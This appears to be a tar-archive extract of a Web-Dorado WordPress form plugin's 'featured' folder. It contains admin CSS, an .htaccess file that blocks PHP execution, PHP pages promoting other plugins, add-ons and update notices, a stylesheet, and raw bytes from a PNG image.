    margin-right: 2%;
    width: 26%;
}
#fm-settings-content .main-plugin .main-plugin-img img{
    max-width:100%;
}
#fm-settings-content .main-plugin .main-plugin-info {
    float: left;
}
#fm-settings-content .main-plugin {
    margin-bottom: 25px;
}
#fm-settings-content .main-plugin_desc-cont p,
#fm-settings-content .main-plugin_desc-cont {
    font-size: 14px;
}
#fm-settings-content .main-plugin-desc-info p{
    margin: 2px 0 13px;
}
#fm-settings-content .fm-addons_updates .main-plugin-desc-info p{
    margin: 2px 0 4px;
}
#fm-settings-content .main-plugin-desc {
    margin-bottom: 12px;
}
#fm-settings-content .main-plugin-info h2 {
    padding: 0;
    line-height: 1;
    margin-bottom: 14px;
}
#fm-settings-content .main-plugin-info h2 a {
    color: #323A45;
    text-decoration: none;
    font-weight: bold;
}
#fm-settings-content .main-plugin-desc-info {
    border-bottom: 1px solid #C0C4C7;
    width: 71%;
}
#fm-settings-content .fm-addons_updates .main-plugin-desc-info {
    border-bottom: 0;
    width: 100%;
}
#fm-settings-content  .update-info {
    background:url(../assets/updates_icon.jpg) no-repeat;
    padding-left:25px;
    color: #bc0b0b;
}
#fm-settings-content .fm-addons_updates .fm-figure {
    margin-bottom: 10px;
}
#fm-settings-content .fm-addons_updates .fm-addon-descr-update {
    border-top: 1px solid #898989;
    padding-top: 6px;
}
#fm-settings-content .fm-addons_updates h2{
    color: #323A45;
    text-decoration: none;
    font-weight: bold;
    border-bottom: 0;
    padding-bottom: 0;
    margin-bottom: 0;
}

.fm_more_updates {
    display: none;
}featured/.htaccess000044400000000424152434416630010147 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>featured/featured.php000060400000035562152434416630010672 0ustar00<?php
function fmc_featured_page($current_plugin = '') {
	$plugins = array(
	"ecommerce-wd" => array(
      'title'    => 'Ecommerce',
      'text'     => 'Wordpress ecommerce plugin',
      'content'  => 'Ecommerce WD is a highly-functional, user friendly WordPress Ecommerce plugin, which is perfect for developing online stores for any level of complexity.',
      'href'     => 'https://web-dorado.com/products/wordpress-ecommerce.html'
    ),
    "form-maker" => array(
      'title'    => 'Form Maker',
      'text'     => 'Wordpress form builder plugin',
      'content'  => 'Form Maker is a modern and advanced tool for creating WordPress forms easily and fast.',
      'href'     => 'https://web-dorado.com/products/wordpress-form.html'
    ),
    "photo-gallery" => array(
      'title'    => 'Photo Gallery',
      'text'     => 'WordPress Photo Gallery plugin',
      'content'  => 'Photo Gallery is a fully responsive WordPress Gallery plugin with advanced functionality.',
      'href'     => 'https://web-dorado.com/products/wordpress-photo-gallery-plugin.html'
    ),
    "contact_form_bulder" => array(
      'title'    => 'Contact Form Builder',
      'text'     => 'WordPress contact form builder plugin',
      'content'  => 'Contact Form Builder is the best tool for quickly arranging a contact form for your clients and visitors.',
      'href'     => 'https://web-dorado.com/products/wordpress-contact-form-builder.html'
    ),
    "slider_wd" => array(
      'title'    => 'Slider WD',
      'text'     => 'WordPress slider plugin',
      'content'  => 'Create responsive, highly configurable sliders with various effects for your WordPress site.',
      'href'     => 'https://web-dorado.com/products/wordpress-slider-plugin.html'
    ),
    "events-wd" => array(
      'title'    => 'Event Calendar WD',
      'text'     => 'WordPress calendar plugin',
      'content'  => 'Organize and publish your events in an easy and elegant way using Event Calendar WD.',
      'href'     => 'https://web-dorado.com/products/wordpress-event-calendar-wd.html'
    ),
    "contact-maker" => array(
      'title'    => 'Contact Form Maker',
      'text'     => 'WordPress contact form maker plugin',
      'content'  => 'WordPress Contact Form Maker is an advanced and easy-to-use tool for creating forms.',
      'href'     => 'https://web-dorado.com/products/wordpress-contact-form-maker-plugin.html'
    ),
    "spider-calendar" => array(
      'title'    => 'Spider Calendar',
      'text'     => 'WordPress event calendar plugin',
      'content'  => 'Spider Event Calendar is a highly configurable product which allows you to have multiple organized events.',
      'href'     => 'https://web-dorado.com/products/wordpress-calendar.html'
    ),
    "catalog" => array(
      'title'    => 'Spider Catalog',
      'text'     => 'WordPress product catalog plugin',
      'content'  => 'Spider Catalog for WordPress is a convenient tool for organizing the products represented on your website into catalogs.',
      'href'     => 'https://web-dorado.com/products/wordpress-catalog.html'
    ),
    "player" => array(
      'title'    => 'Video Player',
      'text'     => 'WordPress Video player plugin',
      'content'  => 'Spider Video Player for WordPress is a Flash & HTML5 video player plugin that allows you to easily add videos to your website with the possibility.',
      'href'     => 'https://web-dorado.com/products/wordpress-player.html'
    ),
    "contacts" => array(
      'title'    => 'Spider Contacts',
      'text'     => 'Wordpress staff list plugin',
      'content'  => 'Spider Contacts helps you to display information about the group of people more intelligible, effective and convenient.',
      'href'     => 'https://web-dorado.com/products/wordpress-contacts-plugin.html'
    ),
    "facebook" => array(
      'title'    => 'Spider Facebook',
      'text'     => 'WordPress Facebook plugin',
      'content'  => 'Spider Facebook is a WordPress integration tool for Facebook.It includes all the available Facebook social plugins and widgets.',
      'href'     => 'https://web-dorado.com/products/wordpress-facebook.html'
    ),
	"facebook-feed" => array(
      'title'    => 'Facebook Feed',
      'text'     => 'WordPress Facebook Feed plugin',
      'content'  => 'Facebook Feed WD is a plugin, which allows embedding Facebook group, page and profile feeds into your website.',
      'href'     => 'https://web-dorado.com/products/wordpress-facebook-feed-plugin.html'
    ),
    "twitter-widget" => array(
      'title'    => 'Widget Twitter',
      'text'     => 'WordPress Widget Twitter plugin',
      'content'  => 'The Widget Twitter plugin lets you to fully integrate your WordPress site with your Twitter account.',
      'href'     => 'https://web-dorado.com/products/wordpress-twitter-integration-plugin.html'
    ),
    "faq" => array(
      'title'    => 'Spider FAQ',
      'text'     => 'WordPress FAQ Plugin',
      'content'  => 'The Spider FAQ WordPress plugin is for creating an FAQ (Frequently Asked Questions) section for your website.',
      'href'     => 'https://web-dorado.com/products/wordpress-faq-plugin.html'
    ),
    "zoom" => array(
      'title'    => 'Zoom',
      'text'     => 'WordPress text zoom plugin',
      'content'  => 'Zoom enables site users to resize the predefined areas of the web site.',
      'href'     => 'https://web-dorado.com/products/wordpress-zoom.html'
    ),
    "flash-calendar" => array(
      'title'    => 'Flash Calendar',
      'text'     => 'WordPress flash calendar plugin',
      'content'  => 'Spider Flash Calendar is a highly configurable Flash calendar plugin which allows you to have multiple organized events.',
      'href'     => 'https://web-dorado.com/products/wordpress-events-calendar.html'
    ),
    "folder_menu" => array(
      'title'    => 'Folder Menu',
      'text'     => 'WordPress folder menu plugin',
      'content'  => 'Folder Menu Vertical is a WordPress Flash menu module for your website, designed to meet your needs and preferences.',
      'href'     => 'https://web-dorado.com/products/wordpress-random-post.html'
    ),
    "random_post" => array(
      'title'    => 'Random post',
      'text'     => 'WordPress random post plugin',
      'content'  => 'Spider Random Post is a small but very smart solution for your WordPress web site.',
      'href'     => 'https://web-dorado.com/products/wordpress-random-post.html'
    ),
    "faq_wd" => array(
      'title'    => 'FAQ WD',
      'text'     => 'WordPress FAQ plugin',
      'content'  => 'Organize and publish your FAQs in an easy and elegant way using FAQ WD.',
      'href'     => 'https://web-dorado.com/products/wordpress-faq-wd.html'
    ),
    "instagram_feed" => array(
      'title'    => 'Instagram Feed WD',
      'text'     => 'WordPress Instagram Feed plugin',
      'content'  => 'WD Instagram Feed is a user-friendly tool for displaying user or hashtag-based feeds on your website.',
      'href'     => 'https://web-dorado.com/products/wordpress-instagram-feed-wd.html'
    ),
	"post-slider" => array(
      'title'    => 'Post Slider',
      'text'     => 'WordPress Post Slider plugin',
      'content'  => 'Post Slider WD is designed to show off the selected posts of your website in a slider.',
      'href'     => 'https://web-dorado.com/products/wordpress-post-slider-plugin.html'
    ),
    "google-maps" => array(
      'title'    => 'Google Map',
      'text'     => 'WordPress Google Maps Plugin',
      'content'  => 'Google Maps WD is an intuitive tool for creating Google maps with advanced markers, custom layers and overlays for your website.',
      'href'     => 'https://web-dorado.com/products/wordpress-google-maps-plugin.html'
    ),
  );
  ?>
	<div id="main_featured_plugins_page">
	<h3>Featured Plugins</h3>
    <div class="featured_header">
		<a href="https://web-dorado.com/wordpress-plugins.html?source=contactformmaker" target="_blank">
			<h1>GET <?php echo $plugins[$current_plugin]["title"]; ?> +22 PLUGINS</h1>
			<h1 class="get_plugins">FOR $100 ONLY <span>- SAVE 70%</span></h1>
			<div class="try-now">
				<span>TRY NOW</span>
			</div>
		</a>
	</div>
	<ul id="featured-plugins-list">
		<?php
		foreach ($plugins as $key => $plugins) {
			if ($current_plugin != $key) {
				?>
				<li class="<?php echo $key; ?>">
					<div class="product"></div>
					<div class="title">
						<strong class="heading"><?php echo $plugins['title']; ?></strong>
					</div>
					<div class="description">
						<p><?php echo $plugins['content']; ?></p>
					</div>
					<a target="_blank" href="<?php echo $plugins['href']; ?>?source=contactformmaker" class="download">Download Plugin &#9658;</a>
				</li>
				<?php
			}
		}
		?>
    </ul>
</div>
<?php
}
function fmc_extensions_page($current_plugin = '') {

		$addons = array(
			'Form Maker Add-ons' => array(
				'imp_exp'   => array(
					'name'        => 'Import/Export',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/export-import.html',
					'description' => 'Form Maker Export/Import WordPress plugin allows exporting and importing forms with/without submissions.',
					'icon'        => '',
					'image'       => plugins_url( '../assets/import_export.png', __FILE__ ),
				),
				'mailchimp' => array(
					'name'        => 'MailChimp',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/mailchimp.html',
					'description' => 'This add-on is an integration of the Form Maker with MailChimp which allows to add contacts to your subscription lists just from submitted forms.',
					'icon'        => '',
					'image'       => plugins_url( '../assets/mailchimp.png', __FILE__ ),
				),				
				'reg' => array(
					'name'        => 'Registration',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/registration.html',
					'description' => 'User Registration add-on integrates with Form maker forms allowing users to create accounts at your website.',
					'icon'        => '',
					'image'       => plugins_url( '../assets/reg.png', __FILE__ ),
				),
				'post_generation' => array(
					'name'        => 'Post Generation',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/post-generation.html',
					'description' => 'Post Generation add-on allows WD_FMC_URL a post, page or custom post based on the submitted data.',
					'icon'        => '',
					'image'       => plugins_url( '../assets/post-generation-update.png', __FILE__ ),
				),
				'conditional_emails' => array(
					'name'        => 'Conditional Emails',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/conditional-emails.html',
					'description' => 'Conditional Emails add-on allows to send emails to different recipients depending on the submitted data .',
					'icon'        => '',
					'image'       => plugins_url( '../assets/conditional-emails-update.png', __FILE__ ),
				),
				'dropbox_integration' => array(
						'name'        => 'Dropbox Integration',
						'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/dropbox.html',
						'description' => 'The Form Maker Dropbox Integration addon is extending the Form Maker capabilities allowing to store the form attachments straight to your Dropbox account.',
						'icon'        => '',
						'image'       => plugins_url( '../assets/dropbox-integration-update.png', __FILE__ ),
				),
				'gdrive_integration' => array(
						'name'        => 'Google Drive Integration',
						'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/google-drive.html',
						'description' => 'The Google Drive Integration add-on integrates Form Maker with Google Drive and allows you to send the file uploads to the Google Drive',
						'icon'        => '',
						'image'       => plugins_url( '../assets/google_drive_integration.png', __FILE__ ),
				),
				'pdf_integration' => array(
						'name'        => 'PDF Integration',
						'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/pdf.html',
						'description' => 'The Form Maker PDF Integration add-on allows sending submitted forms in PDF format.',
						'icon'        => '',
						'image'       => plugins_url( '../assets/pdf-integration.png', __FILE__ ),
				),
				'pushover' => array(
						'name'        => 'Pushover',
						'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/pushover.html',
						'description' => 'Form Maker Pushover integration allows to receive real-time notifications when a user submits a new form. This means messages can be pushed to Android and Apple devices, as well as desktop notification board.',
						'icon'        => '',
						'image'       => plugins_url( '../assets/pushover.png', __FILE__ ),
				),
				'form-maker-save-progress' => array(
					'name'          => 'Save Progress',
					'url'         => 'https://web-dorado.com/products/wordpress-form/add-ons/save-progress.html',
					'description' => 'The add-on allows to save filled in forms as draft and continue editing them subsequently.',
					'icon'        => '',
					'image'       => plugins_url( '../assets/save-progress.png', __FILE__ ),
				)
			)
		);



?>
<link href="<?php echo plugins_url( 'admin.css', __FILE__ )?>" rel="stylesheet"/>
<div class="wrap">
	<?php settings_errors(); ?>
	<div id="fm-settings">
		<div id="fm-settings-content" >
			<h2 id="add_on_title"><?php echo esc_html(get_admin_page_title()); ?></h2>
			<?php
			if($addons){
				foreach ($addons as $name=>$cat) {
					?>

				<!--	<div style="clear: both; margin-top: 15px;"> <h3 class="fm-addon-subtitle"><?php echo $name?> </h3></div> -->
					<?php
					foreach ( $cat as $addon ) {
						?>
						<div class="fm-add-on">
							<h2><?php echo $addon['name'] ?></h2>
							<figure class="fm-figure">
								<div  class="fm-figure-img">
									<a href="<?php echo $addon['url'] ?>" target="_blank">
										<?php if ( $addon['image'] ) { ?>
											<img src="<?php echo $addon['image'] ?>"/>
										<?php } ?>
									</a>
								</div>

								<figcaption class="fm-addon-descr fm-figcaption">

									<?php if ( $addon['icon'] ) { ?>
										<img src="<?php echo $addon['icon'] ?>"/>
									<?php } ?>
									<?php echo $addon['description'] ?>
								</figcaption>
							</figure>
							<?php if ( $addon['url'] !== '#' ) { ?>
								<a href="<?php echo $addon['url'] ?>"
								   target="_blank" class="fm-addon"><span>GET THIS ADD ON</span></a>

							<?php } else { ?>
								<div class="fm_coming_soon">
									<img
										src="<?php echo plugins_url( '../../assets/coming_soon.png', __FILE__ ); ?>"/>
								</div>
							<?php }  ?>
						</div>
					<?php
					}
				}
			}
			?>

		</div>
		<!-- #fm-settings-content -->
	</div>
	<!-- #fm-settings -->
</div><!-- .wrap -->

<?php
}featured/updates.php000060400000011204152434416630010523 0ustar00<?php

/**
 * Admin page
 */

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

$upd = FM_Admin::get_instance();
$upd->check_for_update();
$fm_plugins=$upd->fm_plugins;
$updates=$upd->updates;
?>
<link href="<?php echo plugins_url( 'admin.css', __FILE__ )?>" rel="stylesheet"/>

<div class="wrap">
	<?php settings_errors(); ?>
	<div id="fm-settings">
		<div id="fm-settings-content">
			<h2 id="add_on_title"><?php echo esc_html( get_admin_page_title() ); ?></h2>


			<div class="main-plugin_desc-cont">
				You can download the latest version of your plugins from your  <a href="https://web-dorado.com" target="_blank"> Web-Dorado.com</a>  account.
				After deactivate and
				delete the current version.
				Install the downloaded latest version of the plugin.
			</div>

			<br/>
			<br/>

			<?php
			if ( $fm_plugins ) {
				$update = 0;
				if ( isset( $fm_plugins[31] ) ) {

					$project = $fm_plugins[31];
					unset( $fm_plugins[31] );
					if ( isset( $updates[31] ) ) {
						$update = 1;
					}
					?>
					<div class="main-plugin">
						<div class="fm-add-on">
								<?php if ( $project['fm_data']['image'] ) { ?>
									<div class="fm-figure-img">
										<a href="<?php echo $project['fm_data']['url'] ?>" target="_blank">
											<img src="<?php echo $project['fm_data']['image'] ?>"/>
										</a>
									</div>
								<?php } ?>

						</div>
						<div class="main-plugin-info">
							<h2>
								<a href="<?php echo $project['fm_data']['url'] ?>" target="_blank"><?php echo $project['Title'] ?></a>
							</h2>
							<div class="main-plugin_desc-cont">
								<div class="main-plugin-desc"><?php echo $project['fm_data']['description'] ?></div>
								<div class="main-plugin-desc main-plugin-desc-info">
									<p><a href="<?php echo $project['fm_data']['url'] ?>" target="_blank">Version <?php echo $project['Version']?></a></p>
								</div>

								<?php if ( isset( $updates[31][0] ) ) { ?>
									<span class="update-info">There is a new  <?php echo $updates[31][0]['version'] ?> version available.</span>
									<p><span>What's new:</span></p>
									<div class="fm_last_update"><?php echo $updates[31][0]['version'] ?>
										- <?php echo strip_tags( str_replace('important', '', $updates[31][0]['note']) ) ?></div>
									<?php unset( $updates[31][0] ); ?>
									<?php if ( count( $updates[31] ) > 0 ) { ?>

											<div class="fm_more_updates">
										<?php foreach ( $updates[31] as $update ) {
											?>
											<div class="fm_update"><?php echo $update['version'] ?>
												- <?php echo strip_tags( str_replace('important', '', $update['note']) ) ?></div>
										<?php
										}
										?>
											</div>
										<a href="#" class="fm_show_more_updates">More updates</a>
									<?php
									}
								} ?>
								
								
						
								

							</div>
						</div>
					</div>
				<?php
				}?>
				<div class="fm-addons_updates">
					<?php
					foreach ( $fm_plugins as $id => $project ) {
						?>
						<div class="fm-add-on">
							<figure class="fm-figure">
								<div class="fm-figure-img">
									<a href="<?php echo $project['fm_data']['url'] ?>" target="_blank">
										<?php if ( $project['fm_data']['image'] ) { ?>
											<img src="<?php echo $project['fm_data']['image'] ?>"/>
										<?php } ?>
									</a>
								</div>
								<figcaption class="fm-addon-descr fm-figcaption">
									<?php if ( isset( $updates[ $id ][0] ) ) { ?>
										<p>What's new:</p>
										<?php echo strip_tags( $updates[ $id ][0]['note'] ) ?>
									<?php } else { ?><?php echo $project['Title'] ?> is up to date
									<?php } ?>
								</figcaption>
							</figure>
							<h2><?php echo $project['Title'] ?></h2>
							<div class="main-plugin-desc-info">
								<p><a href="<?php echo $project['fm_data']['url'] ?>"
								      target="_blank"><?php echo $project['Version'] ?></a> | Web-Dorado</p>
							</div>
							<?php if ( isset( $updates[ $id ] ) ) { ?>
								<div class="fm-addon-descr-update">
									<span
										class="update-info">There is an new  <?php echo $updates[ $id ][0]['version'] ?>
										version</span><br/>
								</div>
							<?php } ?>
						</div>
					
					<?php
					}?>
				</div>
			<?php
			}
			?>

		</div>
		<!-- #fm-settings-content -->
	</div>
	<!-- #fm-settings -->
</div><!-- .wrap -->

<script>
    jQuery('.fm_show_more_updates').click(function(){
        if( jQuery('.fm_more_updates').is(':visible') == false) {
            jQuery(this).text('Show less');
        }else{
            jQuery(this).text('More updates');
        }
       jQuery('.fm_more_updates').slideToggle();
        return false;
    });

</script>
featured/style.css000060400000016026152434416630010226 0ustar00@import url(http://fonts.googleapis.com/css?family=Oswald);

#main_featured_plugins_page {
	font-family: Oswald;
  width: 90%;
  margin: 15px auto 0px auto;
}

#main_featured_plugins_page h3 {
    border-bottom: 2px solid #CECECE;
	color: rgb(111, 111, 111);
	font-family: Segoe UI;
	font-size: 18pt;
	margin: 0px auto 15px auto;
	padding: 20px 0;
}

#main_featured_plugins_page #featured-plugins-list {
	position:relative;
	margin:0px auto;
	height:auto;
	display:table;
	list-style:none;
	text-align: center;
	width: 100%;
}

#main_featured_plugins_page #featured-plugins-list li {
  display: inline-table;
  width: 200px;
  margin: 20px 10px 0px 10px;
  background: #FFFFFF;
  border-right: 3px solid #E5E5E5;
  height: 335px;
  border-bottom: 3px solid #E5E5E5;
	position: relative;
}

#main_featured_plugins_page #featured-plugins-list li .product {
	position:relative;
	height:113px;
	background-color: transparent !important;
	background-position-x: 50% !important;
	margin: 7px;
	border-radius: 3px;
  background-size: 115px !important;
}

#main_featured_plugins_page #featured-plugins-list li .title {
	width: 90%;
	text-align: center;
	margin: 0 auto;
}
#main_featured_plugins_page #featured-plugins-list  li.ecommerce-wd  .product {background:url("images/ecommerce.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.form-maker  .product {background:url("images/form.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.catalog  .product {background:url("images/catalog.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.contact-maker  .product {background:url("images/contact.maker.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.contacts  .product {background:url("images/contacts.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.facebook  .product {background:url("images/facebook.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.facebook-feed  .product {background:url("images/facebook-feed.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.faq  .product {background:url("images/faq.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.flash-calendar .product {background:url("images/flash.calendar.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.player  .product {background:url("images/player.png") center center no-repeat;  }
#main_featured_plugins_page #featured-plugins-list  li.spider-calendar  .product {background:url("images/spider.calendar.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.contact_form_bulder .product {background:url("images/contact.builder.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.random_post  .product {background:url("images/random.post.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.slider_wd  .product {background:url("images/slider.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.folder_menu  .product {background:url("images/folder.menu.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.zoom .product {background:url("images/zoom.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.fm-import .product {background:url("images/fm-import.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.photo-gallery  .product {background:url("images/photo-gallery.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.twitter-widget  .product {background:url("images/twittertools.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.events-wd  .product {background:url("images/events-wd.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.faq_wd  .product {background:url("images/faq_wd.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.instagram_feed  .product {background:url("images/instagram_feed.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.post-slider  .product {background:url("images/post-slider.png") center center no-repeat;}
#main_featured_plugins_page #featured-plugins-list  li.google-maps  .product {background:url("images/google-maps.png") center center no-repeat;}

#main_featured_plugins_page #featured-plugins-list li .title .heading {
	display: block;
  position: relative;
  font-size: 17px;
  color: #767676;
  margin: 13px 0px 13px 0px;
  text-transform: uppercase;
}

#main_featured_plugins_page #featured-plugins-list li .title p {
	font-size:14px;
	color:#444;
	margin-left:20px;
}

#main_featured_plugins_page #featured-plugins-list li .description {
	height: 127px;
	width: 90%;
	margin: 0 auto;
}

#main_featured_plugins_page #featured-plugins-list li .description  p {
	text-align: center;
	width: 100%;
	color: #9A9A9A;
	font-family: Segoe UI Light;
}

#featured-plugins-list li a.download {
	display: block;
  border-top: 1px solid #CACACA;
  outline: none;
  width: 90%;
  margin: 0 auto;
  font-size: 14px;
  line-height: 40px;
  text-decoration: none;
  font-weight: bolder;
  text-align: center;
  color: #134D68;
  position: absolute;
  text-transform: uppercase;
  bottom: 0;
  left: 10px;
  font-family: Segoe UI Black;
  text-shadow: 1px 0;
}
	
#featured-plugins-list li a.download:hover {
	color: #F47629;
}

.featured_header{
  background: #11465F;
  border-right: 3px solid #E5E5E5;
  border-bottom: 3px solid #E5E5E5;
  position: relative;
  padding: 20px 0;
}

.featured_header .old_price {
  color: rgba(180, 180, 180, 0.3);
  text-decoration: line-through;
  font-family: Oswald;
}

.featured_header h1.get_plugins {
  color: #FFFFFF;
  height: 85px;
  margin: 0;
  background-size: 85% 100%;
  background-position: center;
  line-height: 60px;
}

.featured_header .try-now{
	text-align: center;
}
	
.featured_header .try-now span {
	display: inline-block;
    padding: 7px 16px;
    background: #F47629;
    border-radius: 10px;
    color: #ffffff;
    font-size: 23px;
}
	
.featured_header h1 {
	font-size: 50px;
	text-align: center;
	color: #FFFFFF;
	letter-spacing: 3px;
	text-transform: uppercase;
}

.featured_header a {
	text-decoration: none;
}

.featured_header .old-price {
	color: #889CA8;
	text-decoration: line-through;
}

@media screen and (max-width: 1105px) {
  .featured_header h1 {
		font-size: 37px;
		line-height: 0;
	}
}

@media screen and (max-width: 835px) {
	.get_plugins span {
		display: none;
	}
}

@media screen and (max-width: 700px) {
	.featured_header h1 {
		line-height: 40px;
	}
}

@media screen and (max-width: 435px) {	
	.featured_header h1 {
		font-size: 20px;
		line-height: 25px;
	}
}featured/images/mottomag.png000060400000220402152434416630012151 0ustar00�PNG


IHDR=
��tEXtSoftwareAdobe ImageReadyq�e<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6d3adad4-ee9e-6545-b78f-b505173e3573" xmpMM:DocumentID="xmp.did:0E6AB106B07311E4999FFB9C579053C2" xmpMM:InstanceID="xmp.iid:0E6AB105B07311E4999FFB9C579053C2" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6d3adad4-ee9e-6545-b78f-b505173e3573" stRef:documentID="xmp.did:6d3adad4-ee9e-6545-b78f-b505173e3573"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�(�>'IDATx���eG}7��'�4wr�ٜٝ��*�B�%�H�&�&������a����+������l^}�3�M��	+ ���*�J�s����n't����Ϲww��v�m-ù��'���m�4Fc4�52\�5-�jmmm<��h�ke��ϳ�Sh�Ƹ�F���
�6Fc4F�����mc4F�����mc4Fc4p���mc4Fc4p���
�6Fc4p���W�0߈Io�ݷ�-A�*s2�j�EI�C7�Y ���xS��M7|�Cɶ��h�Ƹ
�-A,(u��D�vx��Vďf���!D9�;�ӟ>��/��x���2~{϶�*L�/L��</�7;7w� 9v�����hn�ﺕ��^ؿ�Z,΍����3�m۫�911���8;;[.�����
���/?�?��|��7
�����t&�����뺝o�o�
�ۿ�ѿ�+�X�pa���|�fff���/��=�����W��o��jժo��J�;�Ί+�m�v���^x!��ø馛�.]
ۻv�:z��%3����w�}��_{���h,�_��q�����k�5)����n�m��*I���t:53;���p@��03M��7�2��_�����K_�ҢE���?�㣏>z��]��������/)������>t��_��_�����/_�p����K׳X�Ƃn���Ȳ�q��I!Zh�� ��/����{�-��������;v���ltwwwuu����?�����˲`���?����{��gu�~��������g�g�_��#G��'Nh������oϟ?�gϞ�2j�_��@���'A�]_7��_� 
_����= �^���>��S_���մo��o��?��?����D��������D"��\-(��|�;�������l6�����r���)�D'O�t_��~���ϰ�ٳga�̙3�R	f��OOO�߬?(@���s��o����������<0!\�n~~�5���'�|�����z
�cǎ�����@e����_��nNT.�Ս\y��|������A����=���$L�='ǁ�H������I��M���?��0�z)�L�ԩS��楞L[,GGG��Ñp
o~�_�8~���~�޽{����ի��կ~���+�prr2ZX��O���7p�Wr,[����p��<�\*�$`� &����A�)`hh�,���˿��$���+� j����r�k```ݺu�Ȕ�+N��v�j����ccc�X�W0?\*����^P:��#���n�
��k�4f���===�axjf�y�]wVAT�s�=��#�H,��)^z�%�ˀ[�@��:A�K&�3X'p:�������ӆ
�t����w�iw�ڥ��C�<@7�NÓ����p��[�L�Ng�7��
��ݯn����g>�?��?���7o���}E���S���ƦM�`��0�>����������JV8��lX=��~;���0�_XO@����a�‘۶m0OdX���[���Y�K���@�,K
`Dpj�P�Y�\����@ҁ����ݺu+�mmm��A�>i2�|�p#��`~�
�� U�?��c\�d	�H��o��V8h�!��_�[�l�iS�`f�����f͚����R�����Ó��`?<j�N��_G~��ޭi����9��@�_���?���|�c�<��C?��h��o��o\���ל�o��o���r\�HX[p�jV��<��#��������_y\�b��� P��o�Cm_w�u�y
�>���'^�O}�S�v��}��F�ڵk//��K^_����/��Z�C�|?�7�8O\@˯�]���ڟ��hؙ��-Hn��D{@RQ�����HY�ϟ�>�Lu�A+1�rU�������U��h�k�]-ý�����58Г��jמR�X��p�y	�3|�s���?�S��r�=�
���~�z�?��?<�����o|����8e!1��W��@<������{�̙3����/�T�K�a�gL�Q��x�_E�mc\[#�,����o�ƸvF�_Ac4�59�m��h�1�1�m��h�n�1�m��h�n�1����?^gB›cPJ�
ܞ������
J(l¥�'F	��
{��wxk�?P΅�-�Opa��s�#��˖?�G�Py,�S	=���q~	�'�)��?�c�D��%W���	q�~�ɩ��*\�8?��`�Cy+.��
���K0��N�X��6��j2�T�Ua�'31y�RU�'�G?7�T\�m��E]NJJ��4���|t���-�]���Py��X!�Z�\�[T���������������0�p{��K^�‰��]�.�TPI�����:�؁U�^7V�
�"��im1���ko�Ax@)L�|�}@��XBND�!J�40Y�ѣ�C�9o\iQ����Sf�-<���-����%�!5(�>�YԴ�a�X\Xkm�	+\N�yR�I*A:R�#A����B���xL�o���%�z�plV�p�
Ν��]�#IUѓbE1W�#c�h�[3�@ɇ���c�+x�QIR��T� �
IR0��"����rz��>��!��4
�?o��0�4/)	�&�r�Z�����-.�i�d�j��AE=JYC�#�\~�_a�\�?�	�:�(X{�XPòx ��p�V-@Gp��3,�c�n�C�ȫȮ��
L�x�T��
 	U\�@H`Ð<;��T˄p�(��8$�
���C$	�(U�´�Qچ:
NH6L�WD[������H��� �8�M�<.^��L���M-�H�{��L=lܠH�;)#�pM�����Ƞ��)S��"��Hs�o
��j2�yH��4��5��P��|îT���|��H��B���\@�]Q��0�1�?H���	r�톲j$��C��ld̜^˝Zr���0��Ty��)g�i�
f8EW�MItjR��@��ō�i���,�Q��I�����!�s�<��5��l�8�pL%�E��8�R�Q�v)�����Qu��R��d�L�\�&��I�L|�+e����%�+P߃K*�
d��N��H��1)#��RABމꆄ7
�%E*2n)ë���ACj<V��pی�tR�$��9�ƭRjE,�e,$݊���ՆJP(��S �)
5J!�)A�������
